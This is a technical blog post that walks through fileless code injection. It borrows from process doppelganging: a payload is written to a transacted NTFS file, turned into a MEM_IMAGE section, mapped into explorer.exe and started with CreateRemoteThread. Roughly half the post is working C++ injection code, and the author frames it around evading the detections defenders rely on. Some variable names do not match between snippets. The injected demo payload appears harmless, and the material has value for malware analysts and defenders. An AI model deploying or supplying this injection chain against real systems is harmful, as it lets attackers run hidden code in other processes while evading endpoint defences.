Mimicking the Windows Executable Loader's Memory Allocation
I’m not going to blame procrastination this time, even though this is absolutely what this is. No, this is pure autistic fixation.
Let’s start by saying that a lot of the previous blogs have all used a rather lazy technique, and that is “allocating the entire executable image as one piece of memory and marking it as read-write-execute.” If you’re doing anything serious against someone who has better defense than Windows Defender, this raises red flags. I’m merely just a scientist and engineer, not someone who actually works in the field of penetration testing, so I don’t know the reality of the situation as it relates to RWX allocated pages, but in my experience of malware analysis, I would argue this is a good artifact to flag on and understand why it’s being employed.
But this fact that they flag on RWX pages has driven me absolutely bonkers. Not that it’s wrong but what’s the alternative? VirtualAlloc
every single section in the PE
file in such a way that the allocated pages construct an image? Apparently yes, because using MEM_RESERVE
doesn’t let you allocated subsections, but it’s not entirely
accurate to what the loader does. And if we need to worry about constructing an image in a similar way to the loader, we need to figure out what the hell is going on. So I
opened ntoskrnl.exe
in Ida and googled around for kernel resources to figure out how close I could get to the Windows loader.
Abandon VirtualAlloc
You’re not doing it. You’re not going to mimic exactly the way the kernel loads an image because the structures necessary to do it are not exposed by any functions which bridge to userland. So how does it do it? I don’t know jack fuck about Windows kernel internals, but I know my way around Ida and found this paper on what sections are, so let me try and explain what’s going on memory-wise.
NtCreateUserProcess
, the kernel function responsible for creating a process,
does a ton of stuff before it actually allocates the image. When it does, it calls
MmCreateSpecialImageSection
, which ultimately triggers the routine which allocates the PE image. (No documentation because it’s an internal kernel function– sorry!)
This function calls MiCreateSections
, which calls MiCreateImageOrDataSection
, which calls MiCreateNewSection
, which finally calls MiCreateImageFileMap
. All these
functions, too, do a ton of stuff, and it’s not even the end of the rabbit hole, but it’s the part of the rabbit hole I’m going to end on. It’s absolutely ridiculous how
much boilerplate is in these kernel functions that I just don’t understand because I don’t live in kernel land. Complete skill issue.
So why stop at MiCreateImageFileMap
? Because this function is the pivot at which the memory map of our executable is allocated within the kernel process creation call
chain, and is where I can start to explain what it’s doing. Referring back to the paper I linked, what this function is doing is allocating the various sections of the
executable as designated by the IMAGE_SECTION_HEADER
section table within the PE. It can be a little confusing because a section (the noun) is different, but helps create,
a section (the kernel object).
One of the things the kernel can do as its lordship and you cannot as a plebian user is split a kernel section into subsections. It uses the section table as designated
by IMAGE_SECTION_HEADER
in your PE file to allocate the subsections within the kernel image. You may not be aware, but your executable is mapped into memory as a
MEM_IMAGE
section, with its various declared sections (PE) being created as subsections (kernel) of the MEM_IMAGE
.
That may be confusing because I’m having to use the section definitions interchangably, so let’s see what WinDBG tells us about a section in this post’s code example.
This is the .text
section of our example binary. Note the memory type– MEM_IMAGE
. This can only be accomplished when an executable is loaded by the kernel, whether it
be an executable or a DLL. The kernel is royalty, you are merely a plebian user. This is also why the allocation base is at the image root, which isn’t something you can
accomplish with MEM_RESERVE
and allocating the addresses individually, because that is not a subsection, which is reserved for the kernel.
Compare this to when you allocate something with VirtualAlloc
.
This is from a first attempt to allocate a MEM_IMAGE
a la the kernel subsections. Note how the memory type is MEM_PRIVATE
and not MEM_IMAGE
. There’s no way around it–
if we want to mimic the loader, we need to figure out a way to make a MEM_IMAGE
.
You may have heard of a technique called process doppelganging, whose section loader we’re going to cop
from and detail today to explain how to get a MEM_IMAGE
purely in memory. I highly recommend watching
the forbidden video (forbidden because YouTube censors it from search) that covers process doppelganging, as this technique in
totality will be a nice jumping point for a more advanced reason to allocate an image in this way. Since process doppelganging requires mimicking a complex loading process,
we’re simply going to load a MEM_IMAGE
and run the main thread in explorer.exe
for our example. My autistic fixation is purely on how to load an image properly into
memory without touching disk.
All My Homies Hate VirtualAlloc
We know what we need to mimic the loader is to somehow create a MEM_IMAGE
, which can only be accomplished by the kernel. In userland, the kernel function NtCreateSection
is exposed to the user, documentation here. It’s the function capable of
creating a MEM_IMAGE
allocation, but there’s a catch– it requires a file handle. You would think “that’s it, that’s the end of my fileless journey, I give up,” but fret
not! In natural Microsoft fashion, a deprecated API still used by Microsoft today is the
transactional file API.
If you’re familiar with git
, the transactional API has sort of similar functionality. To commit a file to disk, you have to call CommitTransaction
before any changes are
committed. In opposition to this– the function we’ll be taking advantage of– is RollbackTransaction
, documented
here, which rolls back anything written to any files in the transaction. You
will note the transaction handle necessary, which is created by CreateTransaction
, documented
here. For our purposes, we can take advantage of creating a temporary file which is
in the middle of being transacted to load it via NtCreateSection
. All we have to do is close the handle to the file we’ve written to and our target executable stays within
its temporary transacted state!
Here’s what we need to do to properly load our image purely from memory:
- Acquire the target executable in its disk state
- Create a transaction with
CreateTransaction
- Create a file handle to your disk image with
CreateFileTransacted
, documented here - Write your disk image to the file and close the write handle, this will at least commit the write to memory but not to disk because of the transacted state
- Create a new handle that’s readable, still with
CreateFileTransacted
- Allocate a
MEM_IMAGE
withNtCreateSection
with the readable handle - Close the readable handle and call
RollbackTransaction
to flush the disk image from memory and abandon the disk
“Wait,” you’re probably saying, “how do I execute this?” This is only one-half of the puzzle, since you’re working with a section, which doesn’t really become accessible
memory until you map it. Now you need to map it into memory with NtMapViewOfSection
, documented
here. You will note, usefully, this function requires a process handle,
meaning we can remotely map our executable into another process. This is primarily where we diverge from traditional process doppelganging for our example purposes. In a
traditional process doppelganging attempt, the entire process is reconstructed in userland outside of NtCreateUserProcess
. If you don’t need the whole process to be
constructed and you just need a shell of a host– like our example here– you can simply map the image into the memory of your target process and CreateRemoteThread
on it.
Depending on what level of stealth you’re going for– CreateRemoteThread
can be a dead giveaway of nefariousness after all– you may not want to do this and would be
better off with the kernel slog that is doppelganging.
That’s enough theory, let’s walk through our example code. Let’s start with our injectable payload– a modified version of the
sheep monitor payload from a previous post on an injectable style payload. We split our primary functionality of the sheep monitor
into two threads– the loader and the main routine. In this configuration, it’s important not to rely on any imports for the loader, since NtMapViewOfSection
effectively performs no loading tasks other than relocating the binary, so we have to load some functions shellcode-style before we get things kicked off. That loading is
left up to CreateProcess
and NtCreateUserProcess
.
extern "C" __declspec(dllexport) DWORD WINAPI load_image(SheepConfig *config) {
PPEB_EX peb_ex = ((PPEB_EX)__readgsqword(0x60));
PPEB_LDR_DATA_EX ldr_ex = (PPEB_LDR_DATA_EX)peb_ex->LoaderData;
PLDR_DATA_TABLE_ENTRY_EX list_entry = (PLDR_DATA_TABLE_ENTRY_EX)ldr_ex->InLoadOrderModuleList.Flink;
PLDR_DATA_TABLE_ENTRY_EX ntdll_entry = (PLDR_DATA_TABLE_ENTRY_EX)list_entry->InLoadOrderLinks.Flink;
PLDR_DATA_TABLE_ENTRY_EX kernel32_entry = (PLDR_DATA_TABLE_ENTRY_EX)ntdll_entry->InLoadOrderLinks.Flink;
std::uint8_t * (*get_proc_address_win32)(const std::uint8_t *, const char *) = (std::uint8_t *(*)(const std::uint8_t *, const char *))get_proc_address((std::uint8_t *)kernel32_entry->DllBase, "GetProcAddress");
std::uint8_t * (*load_library)(const char *) = (std::uint8_t * (*)(const char *))get_proc_address_win32((std::uint8_t *)kernel32_entry->DllBase, "LoadLibraryA");
BOOL (*virtual_protect)(LPVOID, SIZE_T, DWORD, PDWORD) = (BOOL (*)(LPVOID, SIZE_T, DWORD, PDWORD))get_proc_address_win32((std::uint8_t *)kernel32_entry->DllBase, "VirtualProtect");
From here, we have everything we need to resume loading the binary within the target process, as per
previous posts. You will note how I bootstrapped getting the functions
with a half-baked version of GetProcAddress
and still used GetProcAddress
in the end. This is because I was lazy and didn’t implement import forwarding, which is
discussed briefly here. I say this as if I didn’t completely forget about this caveat when writing the half-baked
GetProcAddress
and run into a confusing bug.
Another thing to note: I’m importing VirtualProtect
. This diverges greatly from our previous loaders because our image is now properly loaded into memory, meaning all the
separate sections have their permissions correctly set, which means there isn’t a guarantee I can write to the import section. So we call VirtualProtect
on the section
before writing resolved imports to it.
while (import_table->OriginalFirstThunk != 0) {
std::uint8_t *module = load_library((const char *)&base_u8[import_table->Name]);
std::uintptr_t *original_thunks = (std::uintptr_t *)&base_u8[import_table->OriginalFirstThunk];
std::uintptr_t *import_addrs = (std::uintptr_t *)&base_u8[import_table->FirstThunk];
std::uintptr_t *old_base = import_addrs;
DWORD old_protect;
DWORD new_protect = PAGE_READWRITE;
virtual_protect(import_addrs, 1024, new_protect, &old_protect);
One final thing to note. To more easily acquire the loader function pointer, since we’re not inside the target image at prep time, we made it an export and manually acquired
the function RVA for use with CreateRemoteThread
.
With our payload prepared and added to our buildchain with the magic of CMake, we’re ready to inject our Sheep Monitor variant into explorer.exe
.
As per the previous post we enumerate for running processes and filter for explorer.exe
. When we find it, we open it with the
same proper privileges we would for standard allocation with VirtualAllocEx
.
See process access rights for more details on what the permissions do. You
primarily need PROCESS_VM_OPERATION
and PROCESS_CREATE_THREAD
rights.
/* open pid with PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE */
HANDLE explorer_proc = OpenProcess(PROCESS_VM_READ | PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, found_pid);
assert(explorer_proc != NULL);
Now the juicy part– mapping our payload. We start by creating a transaction and creating a transacted file, then writing our payload to it.
/* create a new transaction */
HANDLE transaction = CreateTransaction(NULL, NULL, 0, 0, 0, 0, NULL);
assert(transaction != INVALID_HANDLE_VALUE);
/* create a dummy temp file to write to (it won't be written to disk) */
char dummy_name[MAX_PATH+1];
memset(dummy_name, 0, sizeof(dummy_name));
char temp_path[MAX_PATH+1];
memset(temp_path, 0, sizeof(temp_path));
DWORD temp_path_size = GetTempPathA(MAX_PATH, temp_path);
GetTempFileNameA(temp_path, "TH", 0, dummy_name);
HANDLE sheep_monitor_file = CreateFileTransactedA(dummy_name,
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL,
transaction,
NULL,
NULL);
assert(sheep_monitor_file != INVALID_HANDLE_VALUE);
DWORD bytes_written;
assert(WriteFile(sheep_monitor_file, &SHEEP_MONITOR[0], SHEEP_MONITOR_SIZE, &bytes_written, NULL));
CloseHandle(sheep_monitor_file);
Now the payload is written to a transacted file, which can be used in NtCreateSection
. In this state it is not on the disk, it exists purely in the memory of the loading
executable! We then create a new transacted file handle for reading and create our image section with the transacted file. We finally roll back our transaction and wipe the
disk image from memory. The result is that the file never touches the disk and yet is loaded in as a MEM_IMAGE
!
/* read the transacted file into a section */
sheep_monitor_file = CreateFileTransactedA(dummy_name,
GENERIC_READ,
0,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL,
transaction,
NULL,
NULL);
assert(sheep_monitor_file != INVALID_HANDLE_VALUE);
HANDLE sheep_section;
assert(NtCreateSection(&sheep_section,
SECTION_QUERY | SECTION_MAP_READ | SECTION_MAP_EXECUTE,
NULL,
0,
PAGE_READONLY,
SEC_IMAGE,
sheep_monitor_file) == STATUS_SUCCESS);
/* *jedi hands* there was never a file */
CloseHandle(sheep_monitor_file);
assert(RollbackTransaction(transaction));
The final spice on this malware souffle is NtMapViewOfSection
. We provide our target handle to the function and acquire its remote base address for later remote
processing.
PVOID base_address = 0;
SIZE_T size = 0;
DWORD ntstatus = NtMapViewOfSection(sheep_section,
target_proc,
&base_address,
0,
0,
NULL,
&size,
ViewShare,
MEM_DIFFERENT_IMAGE_BASE_OK,
PAGE_EXECUTE_WRITECOPY);
assert(ntstatus == STATUS_SUCCESS || ntstatus == STATUS_IMAGE_AT_DIFFERENT_BASE);
Armed with our remote base address, we can now call our loader function with its respective config and its main routine!
SheepConfig config;
memset(&config, 0, sizeof(SheepConfig));
config.image_base = (uintptr_t)remote_sheep_base;
config.max_sheep = 10;
uintptr_t config_base = (uintptr_t)VirtualAllocEx(explorer_proc, NULL, sizeof(SheepConfig), MEM_COMMIT, PAGE_READWRITE);
SIZE_T bytes_written;
assert(config_base != 0);
assert(WriteProcessMemory(explorer_proc, (LPVOID)config_base, &config, sizeof(SheepConfig), &bytes_written));
DWORD loader_rva = get_export_rva(&SHEEP_MONITOR[0], "load_image");
DWORD loader_id;
HANDLE remote_thread_handle = CreateRemoteThread(explorer_proc,
NULL,
8192,
(LPTHREAD_START_ROUTINE)(remote_sheep_base+loader_rva),
(LPVOID)config_base,
0,
&loader_id);
assert(remote_thread_handle != NULL);
DWORD main_id;
HANDLE main_handle = CreateRemoteThread(explorer_proc,
NULL,
8192,
(LPTHREAD_START_ROUTINE)(remote_sheep_base+sheep_nt->OptionalHeader.AddressOfEntryPoint),
NULL,
0,
&main_id);
assert(main_handle != NULL);
Et voila, you’ve successfully injected a process with a proper memory allocation into a target process without touching disk! I hope you’ve enjoyed learning about this process.